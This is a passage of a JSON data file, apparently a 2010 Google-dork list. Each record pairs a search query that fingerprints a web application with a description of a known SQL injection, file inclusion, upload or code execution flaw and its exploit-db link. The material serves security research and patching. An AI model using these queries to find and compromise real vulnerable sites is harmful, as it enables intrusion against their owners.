Injection Vulnerability - CVE: 2007-6543: http://www.exploit-db.com/exploits/4791", "submited": "2010-11-15", "request": "\" 2005-2006 Powered by eSyndiCat Link Exchange Script\"", "id": 2425}, {"short description": "cat_sell.php?cid=  or  selloffers.php?cid=", "long description": "B2B Trading Marketplace SQL Injection Vulnerability - CVE: 2005-3937: http://www.exploit-db.com/exploits/10656", "submited": "2010-11-15", "request": "cat_sell.php?cid=  or  selloffers.php?cid=", "id": 2426}, {"short description": "\"Powered By Azadi Network\"", "long description": "Azadi Network (page) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10830", "submited": "2010-11-15", "request": "\"Powered By Azadi Network\"", "id": 2427}, {"short description": "\"Powered by i-pos Storefront\"", "long description": "I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: http://www.exploit-db.com/exploits/5717", "submited": "2010-11-15", "request": "\"Powered by i-pos Storefront\"", "id": 2428}, {"short description": "intitle:\"ASP inline corporate calendar\"   inurl:.asp?id=", "long description": "ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: http://www.exploit-db.com/exploits/8756", "submited": "2010-11-15", "request": "intitle:\"ASP inline corporate calendar\"   inurl:.asp?id=", "id": 2429}, {"short description": "inurl:friend.php?op=FriendSend", "long description": "PHP-Nuke 'friend.php' Module Remote SQL Injection: http://www.exploit-db.com/exploits/12525", "submited": "2010-11-15", "request": "inurl:friend.php?op=FriendSend", "id": 2430}, {"short description": "inurl:com_gamesbox", "long description": "Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability - CVE: 2010-2690: http://www.exploit-db.com/exploits/14126", "submited": "2010-11-15", "request": "inurl:com_gamesbox", "id": 2431}, {"short description": "\"Powered by INVOhost\"", "long description": "INVOhost SQL Injection - CVE: 2010-1336: http://www.exploit-db.com/exploits/11874", "submited": "2010-11-15", "request": "\"Powered by INVOhost\"", "id": 2432}, {"short description": "\"Powered by WebStudio eHotel\"", "long description": "WebStudio eHotel (pageid) Blind SQL Injection Vulnerability - CVE: 2008-5293: http://www.exploit-db.com/exploits/7222", "submited": "2010-11-15", "request": "\"Powered by WebStudio eHotel\"", "id": 2433}, {"short description": "inurl:com_redshop", "long description": "Joomla redSHOP Component v1.0 (com_redshop pid) SQL Injection Vulnerability - CVE: 2010-2694: http://www.exploit-db.com/exploits/14312", "submited": "2010-11-15", "request": "inurl:com_redshop", "id": 2435}, {"short description": "\"Powered by yacs\"", "long description": "YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/8066", "submited": "2010-11-15", "request": "\"Powered by yacs\"", "id": 2436}, {"short description": "\"(C) by CyberTeddy\"", "long description": "WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: http://www.exploit-db.com/exploits/3484", "submited": "2010-11-15", "request": "\"(C) by CyberTeddy\"", "id": 2437}, {"short description": "\"Powered by Shout!\"", "long description": "ShoutCMS (content.php) Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11305", "submited": "2010-11-15", "request": "\"Powered by Shout!\"", "id": 2438}, {"short description": "\"2007 BookmarkX script\"", "long description": "BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: http://www.exploit-db.com/exploits/5040", "submited": "2010-11-15", "request": "\"2007 BookmarkX script\"", "id": 2440}, {"short description": "Doop CMS", "long description": "doop CMS 1.3.7 (page) Local File Inclusion Vulnerability - CVE: 2007-5465: http://www.exploit-db.com/exploits/4536", "submited": "2010-11-15", "request": "Doop CMS", "id": 2441}, {"short description": "\"powered by sazcart\"", "long description": "SazCart 1.5 (cart.php) Remote File Include Vulnerability - CVE: 2006-5727: http://www.exploit-db.com/exploits/2718", "submited": "2010-11-15", "request": "\"powered by sazcart\"", "id": 2442}, {"short description": "inurl:com_community", "long description": "Joomla Template BizWeb com_community Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/13955", "submited": "2010-11-15", "request": "inurl:com_community", "id": 2443}, {"short description": "allinurl:\"/questcms/\"", "long description": "Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities - CVE: 2008-4773: http://www.exploit-db.com/exploits/6853", "submited": "2010-11-15", "request": "allinurl:\"/questcms/\"", "id": 2444}, {"short description": "inurl:news.php?mode=voir", "long description": "TR News 2.1 (nb) Remote SQL Injection Vulnerability - CVE: 2008-1957: http://www.exploit-db.com/exploits/5483", "submited": "2010-11-15", "request": "inurl:news.php?mode=voir", "id": 2446}, {"short description": "\" Powered by Pie Cart Pro \"", "long description": "Pie Cart Pro (Home_Path) Remote File Include Vulnerability - CVE: 2006-4970: http://www.exploit-db.com/exploits/2392", "submited": "2010-11-15", "request": "\" Powered by Pie Cart Pro \"", "id": 2447}, {"short description": "allinurl:readmore.php?news_id", "long description": "PHP-Fusion v4.01 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12635", "submited": "2010-11-15", "request": "allinurl:readmore.php?news_id", "id": 2448}, {"short description": "inurl:index.php?ini[langpack]=", "long description": "Weatimages 1.7.1 ini[langpack] Remote File Inclusion Vulnerability - CVE: 2007-1999: http://www.exploit-db.com/exploits/3700", "submited": "2010-11-15", "request": "inurl:index.php?ini[langpack]=", "id": 2449}, {"short description": "\"Powered by Elgg, the leading open source social networking platform\"", "long description": "elgg 1.5 (/_css/js.php) Local File Inclusion Vulnerability - CVE: 2009-3149: http://www.exploit-db.com/exploits/9355", "submited": "2010-11-15", "request": "\"Powered by Elgg, the leading open source social networking platform\"", "id": 2450}, {"short description": "inurl:/index.php?option=com_yellowpages", "long description": "Joomla Yellowpages SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14592", "submited": "2010-11-15", "request": "inurl:/index.php?option=com_yellowpages", "id": 2451}, {"short description": "allinurl:\"channel_detail.php?chid=\"", "long description": "YouTube Clone Script (msg.php id) Remote SQL Injection Vulnerability - CVE: 2007-3518: http://www.exploit-db.com/exploits/4136", "submited": "2010-11-15", "request": "allinurl:\"channel_detail.php?chid=\"", "id": 2452}, {"short description": "inurl:apages.php", "long description": "Arab Network Tech. (ANT) CMS SQL Injection: http://www.exploit-db.com/exploits/11339", "submited": "2010-11-15", "request": "inurl:apages.php", "id": 2453}, {"short description": "\"Emanuele Guadagnoli\" \"CcMail\"", "long description": "CcMail", "submited": "2010-11-15", "request": "\"Emanuele Guadagnoli\" \"CcMail\"", "id": 2454}, {"short description": "This FAQ is powered by CascadianFAQ", "long description": "CascadianFAQ 4.1 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-0631: http://www.exploit-db.com/exploits/3227", "submited": "2010-11-15", "request": "This FAQ is powered by CascadianFAQ", "id": 2456}, {"short description": "\"Designed &amp; Developed by net-finity\"", "long description": "net-finity (links.php) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/4629", "submited": "2010-11-15", "request": "\"Designed &amp; Developed by net-finity\"", "id": 2457}, {"short description": "intext:Powered by CPA Site Solutions", "long description": "CPA Site Solutions Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11365", "submited": "2010-11-15", "request": "intext:Powered by CPA Site Solutions", "id": 2458}, {"short description": "\"site powered by intuitive-websites.com\"", "long description": "intuitive (form.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11481", "submited": "2010-11-15", "request": "\"site powered by intuitive-websites.com\"", "id": 2460}, {"short description": "ClearBudget v0.6.1", "long description": "ClearBudget 0.6.1 Insecure Cookie Handling / LFI Vulnerabilities: http://www.exploit-db.com/exploits/7992", "submited": "2010-11-15", "request": "ClearBudget v0.6.1", "id": 2461}, {"short description": "inurl:func=selectcat + com_remository", "long description": "Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability - CVE: 2007-4505: http://www.exploit-db.com/exploits/4306", "submited": "2010-11-15", "request": "inurl:func=selectcat + com_remository", "id": 2464}, {"short description": "\"ShopMaker v1.0\"", "long description": "ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6799", "submited": "2010-11-15", "request": "\"ShopMaker v1.0\"", "id": 2465}, {"short description": "\"Powered by jSite 1.0 OE\"", "long description": "jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: http://www.exploit-db.com/exploits/6057", "submited": "2010-11-15", "request": "\"Powered by jSite 1.0 OE\"", "id": 2466}, {"short description": "Powered by Online Email Manager", "long description": "Online Email Manager Insecure Cookie Handling Vulnerability: http://www.exploit-db.com/exploits/8476", "submited": "2010-11-15", "request": "Powered by Online Email Manager", "id": 2467}, {"short description": "\"Web Site Design by Red Cat Studios\"", "long description": "Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12776", "submited": "2010-11-15", "request": "\"Web Site Design by Red Cat Studios\"", "id": 2468}, {"short description": "inurl:\"webboard/view.php?topic=\"", "long description": "Webboard v.2.90 beta Remote File Disclosure Vulnerability - CVE: 2009-2600: http://www.exploit-db.com/exploits/8823", "submited": "2010-11-15", "request": "inurl:\"webboard/view.php?topic=\"", "id": 2471}, {"short description": "/index.php?option=com_restaurante", "long description": "Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: http://www.exploit-db.com/exploits/4383", "submited": "2010-11-15", "request": "/index.php?option=com_restaurante", "id": 2472}, {"short description": "inurl:\"com_portfol\"", "long description": "Joomla Component Portfol (vcatid) SQL Injection Vulnerability - CVE: 2009-0494: http://www.exploit-db.com/exploits/7734", "submited": "2010-11-15", "request": "inurl:\"com_portfol\"", "id": 2473}, {"short description": "Copyright 2010 ASP SiteWare. All rights reserved.", "long description": "MSSQLi Vulnerability in AutoDealer Ver.1 and Ver.2 - CVE: 2007-0053: http://www.exploit-db.com/exploits/12462", "submited": "2010-11-15", "request": "Copyright 2010 ASP SiteWare. All rights reserved.", "id": 2476}, {"short description": "intitle:\"DUcalendar 1.0\"", "long description": "DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: http://www.exploit-db.com/exploits/5927", "submited": "2010-11-15", "request": "intitle:\"DUcalendar 1.0\"", "id": 2477}, {"short description": "inurl:/infusions/e_cart", "long description": "PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability - CVE: 2009-0832: http://www.exploit-db.com/exploits/7698", "submited": "2010-11-15", "request": "inurl:/infusions/e_cart", "id": 2479}, {"short description": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground A Clans A Store A Jobs A Auction A Spells Shop A Statistics A Member List\"", "long description": "vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: http://www.exploit-db.com/exploits/4166", "submited": "2010-11-15", "request": "intext:\"RPG Inferno is not available to guests\" or intext:\"Battle Ground A Clans A Store A Jobs A Auction A Spells Shop A Statistics A Member List\"", "id": 2480}, {"short description": ":  Find it yourself ;)", "long description": "http://www.exploit-db.com/exploits/5756", "submited": "2010-11-15", "request": "", "id": 2481}, {"short description": "inurl:com_jstore", "long description": "joomla com_jstore SQLi Vulnerability: http://www.exploit-db.com/exploits/13796", "submited": "2010-11-15", "request": "inurl:com_jstore", "id": 2484}, {"short description": "APBoard 2.1.0 2003-2010 APP - Another PHP Program", "long description": "APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14559", "submited": "2010-11-15", "request": "APBoard 2.1.0 2003-2010 APP - Another PHP Program", "id": 2485}, {"short description": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "long description": "PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln - CVE: 2007-4054: http://www.exploit-db.com/exploits/4241", "submited": "2010-11-15", "request": "allintext:\"Browse our directory of our members top sites or create your own for free!\"", "id": 2486}, {"short description": "allinurl:flashblog.html \"flashblog\"", "long description": "FlashBlog (articulo_id) Remote SQL Injection Vulnerability - CVE: 2008-2572: http://www.exploit-db.com/exploits/5685", "submited": "2010-11-15", "request": "allinurl:flashblog.html \"flashblog\"", "id": 2487}, {"short description": "com_easybook", "long description": "Joomla Component EasyBook 1.1 (gbid) SQL Injection - CVE: 2008-2569: http://www.exploit-db.com/exploits/5740", "submited": "2010-11-15", "request": "com_easybook", "id": 2489}, {"short description": "inurl:index.php?option=com_nicetalk", "long description": "Joomla Component Nice Talk 0.9.3 (tagid) SQL Injection Vulnerability - CVE: 2007-4503: http://www.exploit-db.com/exploits/4308", "submited": "2010-11-15", "request": "inurl:index.php?option=com_nicetalk", "id": 2490}, {"short description": "\"ParsBlogger  ? 2006. All rights reserved\"", "long description": "ParsBlogger (links.asp id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6745", "submited": "2010-11-15", "request": "\"ParsBlogger  ? 2006. All rights reserved\"", "id": 2491}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: http://www.exploit-db.com/exploits/12806", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 2492}, {"short description": "powered by minimal Gallery 0.8", "long description": "minimal Gallery 0.8 Remote File Disclosure Vulnerability - CVE: 2008-0259: http://www.exploit-db.com/exploits/4902", "submited": "2010-11-15", "request": "powered by minimal Gallery 0.8", "id": 2493}, {"short description": "powered by sX-Shop", "long description": "sX-Shop (view_image.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14557", "submited": "2010-11-15", "request": "powered by sX-Shop", "id": 2494}, {"short description": "inurl:\"com_ignitegallery\"", "long description": "Joomla Component Ignite Gallery 0.8.3 SQL Injection Vulnerability - CVE: 2008-6182: http://www.exploit-db.com/exploits/6723", "submited": "2010-11-15", "request": "inurl:\"com_ignitegallery\"", "id": 2495}, {"short description": "inurl:com_brightweblinks", "long description": "Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability - CVE: 2008-3083: http://www.exploit-db.com/exploits/5993", "submited": "2010-11-15", "request": "inurl:com_brightweblinks", "id": 2497}, {"short description": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "long description": "PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: http://www.exploit-db.com/exploits/2369", "submited": "2010-11-15", "request": "\"Powered by: PhotoPost PHP 4.6\" or \"Powered by: PhotoPost PHP 4.5\"", "id": 2498}, {"short description": "Powered by odlican.net cms v.1.5", "long description": "odlican.net cms v.1.5 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/11340", "submited": "2010-11-15", "request": "Powered by odlican.net cms v.1.5", "id": 2501}, {"short description": "Powered By form2list", "long description": "form2list (page.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8348", "submited": "2010-11-15", "request": "Powered By form2list", "id": 2502}, {"short description": "inurl:/_blogadata/", "long description": "Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability - CVE: 2008-1763: http://www.exploit-db.com/exploits/5368", "submited": "2010-11-15", "request": "inurl:/_blogadata/", "id": 2503}, {"short description": "SPBOARD v4.5", "long description": "Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability - CVE: 2008-4873: http://www.exploit-db.com/exploits/6864", "submited": "2010-11-15", "request": "SPBOARD v4.5", "id": 2505}, {"short description": "inurl:com_jmarket", "long description": "joomla com_jmarket SQLi Vulnerability: http://www.exploit-db.com/exploits/13799", "submited": "2010-11-15", "request": "inurl:com_jmarket", "id": 2506}, {"short description": "inurl:com_jtickets", "long description": "joomla com_jtickets SQLi Vulnerability: http://www.exploit-db.com/exploits/13797", "submited": "2010-11-15", "request": "inurl:com_jtickets", "id": 2507}, {"short description": "inurl:\"com_rwcards\"", "long description": "Joomla Component com_rwcards - Local File Inclusion: http://www.exploit-db.com/exploits/11772", "submited": "2010-11-15", "request": "inurl:\"com_rwcards\"", "id": 2509}, {"short description": "\"index.php?sbjoke_id=\"", "long description": "Jokes &amp; Funny Pics Script (sb_jokeid) SQL Injection Vulnerability - CVE: 2008-2874: http://www.exploit-db.com/exploits/5934", "submited": "2010-11-15", "request": "\"index.php?sbjoke_id=\"", "id": 2510}, {"short description": "\"This website was created with phpWebThings\"", "long description": "phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: http://www.exploit-db.com/exploits/2811", "submited": "2010-11-15", "request": "\"This website was created with phpWebThings\"", "id": 2511}, {"short description": "inurl:questions.php?idcat", "long description": "EsFaq 2.0 (idcat) Remote SQL Injection Vulnerability - CVE: 2008-3952: http://www.exploit-db.com/exploits/6383", "submited": "2010-11-15", "request": "inurl:questions.php?idcat", "id": 2512}, {"short description": "photokorn 1.52", "long description": "PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: http://www.exploit-db.com/exploits/2327", "submited": "2010-11-15", "request": "photokorn 1.52", "id": 2513}, {"short description": "Powered by SAPID CMF Build 87", "long description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/5097", "submited": "2010-11-15", "request": "Powered by SAPID CMF Build 87", "id": 2514}, {"short description": "inurl:\"directory.php?cat=\" pubs", "long description": "Prozilla Pub Site Directory (directory.php cat) SQL Injection Vulnerbility - CVE: 2007-4258: http://www.exploit-db.com/exploits/4265", "submited": "2010-11-15", "request": "inurl:\"directory.php?cat=\" pubs", "id": 2515}, {"short description": "inurl:\"userjournals.php?blog.\"", "long description": "e107 Plugin userjournals_menu (blog.id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8417", "submited": "2010-11-15", "request": "inurl:\"userjournals.php?blog.\"", "id": 2517}, {"short description": "inurl:\"com_youtube\"", "long description": "Joomla Component (com_youtube) SQL Injection Vulnerability - CVE: 2010-2923: http://www.exploit-db.com/exploits/14467", "submited": "2010-11-15", "request": "inurl:\"com_youtube\"", "id": 2518}, {"short description": "inurl:\"index.php?serverid=\"", "long description": "Ultrastats 0.2.144/0.3.11 (index.php serverid) SQL Injection Vulnerability - CVE: 2008-6260: http://www.exploit-db.com/exploits/7148", "submited": "2010-11-15", "request": "inurl:\"index.php?serverid=\"", "id": 2519}, {"short description": "inurl:\"com_photoblog\"", "long description": "Joomla (com_photoblog) Blind Sql Injection Vulnerability - CVE: 2010-0610: http://www.exploit-db.com/exploits/11337", "submited": "2010-11-15", "request": "inurl:\"com_photoblog\"", "id": 2523}, {"short description": "inurl:indexmess.php", "long description": "Messagerie Locale (centre.php) Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/2832", "submited": "2010-11-15", "request": "inurl:indexmess.php", "id": 2524}, {"short description": "Powered by phpFaber URLInn. Copyright 2004-2006 phpFaber", "long description": "phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: http://www.exploit-db.com/exploits/4588", "submited": "2010-11-15", "request": "Powered by phpFaber URLInn. Copyright 2004-2006 phpFaber", "id": 2525}, {"short description": "inurl:com_joomradio", "long description": "Joomla Component joomradio 1.0 (id) SQL Injection Vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/5729", "submited": "2010-11-15", "request": "inurl:com_joomradio", "id": 2526}, {"short description": "inurl:com_jnewsletter", "long description": "joomla com_jnewsletter SQLi Vulnerability: http://www.exploit-db.com/exploits/13804", "submited": "2010-11-15", "request": "inurl:com_jnewsletter", "id": 2527}, {"short description": "inurl:inc_classifiedlistingsmanager.asp", "long description": "DMXReady Classified Listings Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0426: http://www.exploit-db.com/exploits/7767", "submited": "2010-11-15", "request": "inurl:inc_classifiedlistingsmanager.asp", "id": 2528}, {"short description": "Powered by Online Guestbook Pro", "long description": "Online Guestbook Pro (display) Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8475", "submited": "2010-11-15", "request": "Powered by Online Guestbook Pro", "id": 2529}, {"short description": "\"Powered by PG Online Training Solution - learning management system\"", "long description": "Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability - CVE: 2008-4709: http://www.exploit-db.com/exploits/6613", "submited": "2010-11-15", "request": "\"Powered by PG Online Training Solution - learning management system\"", "id": 2531}, {"short description": "inurl:\"track.php?id=\"", "long description": "phpstore Wholesale (track.php?id) SQL Injection Vulnerability - CVE: 2008-5493: http://www.exploit-db.com/exploits/7134", "submited": "2010-11-15", "request": "inurl:\"track.php?id=\"", "id": 2532}, {"short description": "inurl:com_jcommunity", "long description": "joomla com_jcommunity SQLi Vulnerability: http://www.exploit-db.com/exploits/13798", "submited": "2010-11-15", "request": "inurl:com_jcommunity", "id": 2533}, {"short description": "inurl:cart.php?m=features&amp;id=", "long description": "digiSHOP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15405", "submited": "2010-11-15", "request": "inurl:cart.php?m=features&amp;id=", "id": 2534}, {"short description": "/modules/tadbook2/open_book.php?book_sn=", "long description": "XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: http://www.exploit-db.com/exploits/7725", "submited": "2010-11-15", "request": "/modules/tadbook2/open_book.php?book_sn=", "id": 2537}, {"short description": "''links.asp?CatId''", "long description": "ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: http://www.exploit-db.com/exploits/5276", "submited": "2010-11-15", "request": "&#039;&#039;links.asp?CatId&#039;&#039;", "id": 2540}, {"short description": "\"Bu Site Ticimax E-Ticaret yaz1l1m1 1le haz1rlanm1st1r.\"", "long description": "Ticimax E-Ticaret ( SQL Injection ): http://www.exploit-db.com/exploits/12841", "submited": "2010-11-15", "request": "\"Bu Site Ticimax E-Ticaret yaz1l1m1 ile haz1rlanm1st1r.\"", "id": 2541}, {"short description": "Powered by NKINFOWEB VSp 2009", "long description": "NKINFOWEB SQL Injection - CVE: 2010-1599: http://www.exploit-db.com/exploits/12354", "submited": "2010-11-15", "request": "Powered by NKINFOWEB VSp 2009", "id": 2542}, {"short description": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "long description": "PHPDirector 0.30 (videos.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14106", "submited": "2010-11-15", "request": "Powered by: PHPDirector 0.30 or nurl:videos.php?id=", "id": 2543}, {"short description": "Powered by:   Arab Portal  inurl:mod.php?mod=html", "long description": "Arab Portal 2.1 Remote File Disclosure Vulnerability - CVE: 2008-5787: http://www.exploit-db.com/exploits/7019", "submited": "2010-11-15", "request": "Powered by:   Arab Portal  inurl:mod.php?mod=html", "id": 2544}, {"short description": "\"Powered by RedCat\" inurl:index.php?contentId=", "long description": "redcat media SQL Injection: http://www.exploit-db.com/exploits/10043", "submited": "2010-11-15", "request": "\"Powered by RedCat\" inurl:index.php?contentId=", "id": 2545}, {"short description": "inurl:\"search_form.php?sb_showresult=\"", "long description": "Getacoder clone (sb_protype) Remote SQL Injection Vulnerability - CVE: 2008-3372: http://www.exploit-db.com/exploits/6143", "submited": "2010-11-15", "request": "inurl:\"search_form.php?sb_showresult=\"", "id": 2546}, {"short description": "Powered by boastMachine v3.1", "long description": "boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: http://www.exploit-db.com/exploits/4952", "submited": "2010-11-15", "request": "Powered by boastMachine v3.1", "id": 2548}, {"short description": "\"index.php?section=post_upload\"", "long description": "DDL-Speed Script (acp/backup) Admin Backup Bypass Vulnerability: http://www.exploit-db.com/exploits/7629", "submited": "2010-11-15", "request": "\"index.php?section=post_upload\"", "id": 2549}, {"short description": ": allinurl: In YoUr Dream Lamerz", "long description": "http://www.exploit-db.com/exploits/14078", "submited": "2010-11-15", "request": "", "id": 2550}, {"short description": "Copyright 2007, PHPAUCTION.NET", "long description": "phpAuction 3.2.1 (item.php id) Remote SQL Injection Vulnerability - CVE: 2008-2900: http://www.exploit-db.com/exploits/5892", "submited": "2010-11-15", "request": "Copyright 2007, PHPAUCTION.NET", "id": 2551}, {"short description": "Online Booking Manager2.2", "long description": "Online Booking Manager 2.2 (id) SQL Injection Vulnerability - CVE: 2008-5194: http://www.exploit-db.com/exploits/5964", "submited": "2010-11-15", "request": "Online Booking Manager2.2", "id": 2552}, {"short description": "\"cms SunLight 5.2\"", "long description": "SunLight CMS 5.3 (root) Remote File Inclusion Vulnerabilities - CVE: 2007-2774: http://www.exploit-db.com/exploits/3953", "submited": "2010-11-15", "request": "\"cms SunLight 5.2\"", "id": 2553}, {"short description": "option=com_paxxgallery", "long description": "Joomla Component paxxgallery 0.2 (gid) Blind SQL Injection: http://www.exploit-db.com/exploits/5514", "submited": "2010-11-15", "request": "option=com_paxxgallery", "id": 2554}, {"short description": "inurl:index.php?option=com_NeoRecruit", "long description": "Joomla Component NeoRecruit 1.4 (id) SQL Injection Vulnerability - CVE: 2007-4506: http://www.exploit-db.com/exploits/4305", "submited": "2010-11-15", "request": "inurl:index.php?option=com_NeoRecruit", "id": 2555}, {"short description": "powered by x7 chat 1.3.6b", "long description": "X7CHAT v1.3.6b Add Admin: http://www.exploit-db.com/exploits/10931", "submited": "2010-11-15", "request": "powered by x7 chat 1.3.6b", "id": 2557}, {"short description": "\"Powered by Battle Blog\"", "long description": "Battle Blog 1.25 (comment.asp) Remote SQL Injection Vulnerability - CVE: 2008-2626: http://www.exploit-db.com/exploits/5731", "submited": "2010-11-15", "request": "\"Powered by Battle Blog\"", "id": 2558}, {"short description": "inurl:\"vcalendar_asp\"", "long description": "VCalendar (VCalendar.mdb) Remote Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7180", "submited": "2010-11-15", "request": "inurl:\"vcalendar_asp\"", "id": 2559}, {"short description": "inurl:\"com_simpledownload\"", "long description": "Joomla Component simpledownload Local File Disclosure - CVE: 2010-2122: http://www.exploit-db.com/exploits/12623", "submited": "2010-11-15", "request": "inurl:\"com_simpledownload\"", "id": 2561}, {"short description": "allinurl :\"/modules/tutorials/\"", "long description": "XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability - CVE: 2008-1351: http://www.exploit-db.com/exploits/5245", "submited": "2010-11-15", "request": "allinurl :\"/modules/tutorials/\"", "id": 2562}, {"short description": "intext:Powered by Infront", "long description": "Infront SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13848", "submited": "2010-11-15", "request": "intext:Powered by Infront", "id": 2563}, {"short description": "Powered by Info Fisier.", "long description": "Info Fisier 1.0 multiple Vulnerabilities: http://www.exploit-db.com/exploits/10728", "submited": "2010-11-15", "request": "Powered by Info Fisier.", "id": 2564}, {"short description": "powered by joovili", "long description": "Joovili 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability - CVE: 2007-6621: http://www.exploit-db.com/exploits/4799", "submited": "2010-11-15", "request": "powered by joovili", "id": 2565}, {"short description": "intext:Powered by SaphpLesson 4.0", "long description": "SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: http://www.exploit-db.com/exploits/9248", "submited": "2010-11-15", "request": "intext:Powered by SaphpLesson 4.0", "id": 2566}, {"short description": "infusions/triscoop_race_system/race_details.php?", "long description": "PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln: http://www.exploit-db.com/exploits/6684", "submited": "2010-11-15", "request": "infusions/triscoop_race_system/race_details.php?", "id": 2568}, {"short description": "Powered by WHMCompleteSolution - or   inurl:WHMCS", "long description": "WHMCS control (WHMCompleteSolution) Sql Injection - CVE: 2010-1702: http://www.exploit-db.com/exploits/12371", "submited": "2010-11-15", "request": "Powered by WHMCompleteSolution - or   inurl:WHMCS", "id": 2569}, {"short description": "intext:\"Event List 0.8 Alpha by schlu.net \"", "long description": "Joomla Component EventList 0.8 (did) SQL Injection Vulnerability - CVE: 2007-4509: http://www.exploit-db.com/exploits/4309", "submited": "2010-11-15", "request": "intext:\"Event List 0.8 Alpha by schlu.net \"", "id": 2570}, {"short description": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "long description": "Zeeways Script Multiple Vulnerabilities - CVE: 2010-2144: http://www.exploit-db.com/exploits/12805", "submited": "2010-11-15", "request": "inurl:\"product_desc.php?id=\" Powered by Zeeways.com", "id": 2572}, {"short description": "\"Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media\"", "long description": "Subdreamer Pro v3.0.4 CMS upload Vulnerability: http://www.exploit-db.com/exploits/14101", "submited": "2010-11-15", "request": "\"Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media\"", "id": 2573}, {"short description": "developed by ARWScripts.com", "long description": "Free Photo Gallery Site Script (path) File Disclosure Vulnerability - CVE: 2008-1730: http://www.exploit-db.com/exploits/5419", "submited": "2010-11-15", "request": "developed by ARWScripts.com", "id": 2574}, {"short description": "\"powered by CMS Made Simple version 1.1.2\"", "long description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability - CVE: 2007-5056: http://www.exploit-db.com/exploits/4442", "submited": "2010-11-15", "request": "\"powered by CMS Made Simple version 1.1.2\"", "id": 2575}, {"short description": "\"Desenvolvido por WeBProdZ\"", "long description": "WeBProdZ CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12522", "submited": "2010-11-15", "request": "\"Desenvolvido por WeBProdZ\"", "id": 2577}, {"short description": "inurl:\"inurl:file.php?recordID=\"", "long description": "FILE SHARE v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10497", "submited": "2010-11-15", "request": "inurl:\"inurl:file.php?recordID=\"", "id": 2579}, {"short description": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "long description": "Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability - CVE: 2008-1783: http://www.exploit-db.com/exploits/5387", "submited": "2010-11-15", "request": "inurl:\"view.php?ItemID=\" rating \"rate this review\"", "id": 2580}, {"short description": "\"Webdesign 